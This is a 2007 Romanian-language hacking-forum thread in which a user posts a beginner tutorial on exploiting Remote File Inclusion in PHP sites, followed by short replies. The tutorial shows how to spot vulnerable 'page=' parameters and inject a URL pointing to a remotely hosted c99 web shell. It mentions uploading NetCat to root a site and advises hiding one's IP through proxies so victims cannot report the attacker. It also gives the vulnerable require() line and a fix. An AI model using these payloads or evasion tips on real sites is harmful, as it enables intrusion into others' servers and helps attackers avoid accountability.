Zero_Cool666 Posted May 2, 2007 Report Share Posted May 2, 2007 RFI = Remote File InclusionLFI = Local File InclusionCu aceasta vulnerabilitate, puteti introduce un shell, sau un script php intr-un anumit site vulnerabil.Deobicei, cei care folosesc RFI, uploadeaza un shell sau NetCat (pentru a roota site-ul).Acum o sa va explic cum sta treaba cu RFI-ul.Cum puteti sa va dati seama ca un site ar putea fi vulnerabil la rfi ?Foarte Simplu, Vulnerabilitatea se afla in index.php?page= sau etc.Sunt diferite pagini.De ex. mai exista si index.php?path=, etc.Un site Vulnerabil la RFI ar trebui sa arate cam asa :http://www.yoursite.com/index.php?page=Pentru a testa manual daca site-ul este vulnerabil la RFI :http://www.yoursite.com/index.php?page=[evil_shell][evil_shell] = Calea (Path-ul) Catre Shell.De exemplu http://shockingsoft.uv.ro/c99.txtIn fisierul PHP, vulnerabilitatea este :require($page . “pagina.php”);Repararea bug-ului este :require(”pagina.php”);HINT 1 : Nu este vorba de host, este vorba de scriptul PHPHINT 2 : Ar fi bine sa va ascundeti IP-ul cu Proxy, Hide IP Platinium sau AOL.De ce ?Pentru ca log-uriile sa salveaza pe server, in log arata absolut ce face fiecare user, chiar daca intri pe index.php, in log scrie.Si dupaia puteti fi reclamat la ISP, etc. Quote Link to comment Share on other sites More sharing options...
vladiii Posted May 2, 2007 Report Share Posted May 2, 2007 as face si eu o mica completare, rfi se mai rezolva si declarand variabila $page, $menu sau ce mai este acolo Quote Link to comment Share on other sites More sharing options...
Zero_Cool666 Posted May 2, 2007 Author Report Share Posted May 2, 2007 dap, correct.dar la vremea cand am facut tutorialu nu prea stiam php Quote Link to comment Share on other sites More sharing options...
zbeng Posted May 3, 2007 Report Share Posted May 3, 2007 este unu mai complet pus de mine la articole parca;)Voi reveni cu noi tut in 7 zile ca imi vine netu Quote Link to comment Share on other sites More sharing options...
cein Posted May 3, 2007 Report Share Posted May 3, 2007 Bun tut pt incepatori.. si nu numai. Quote Link to comment Share on other sites More sharing options...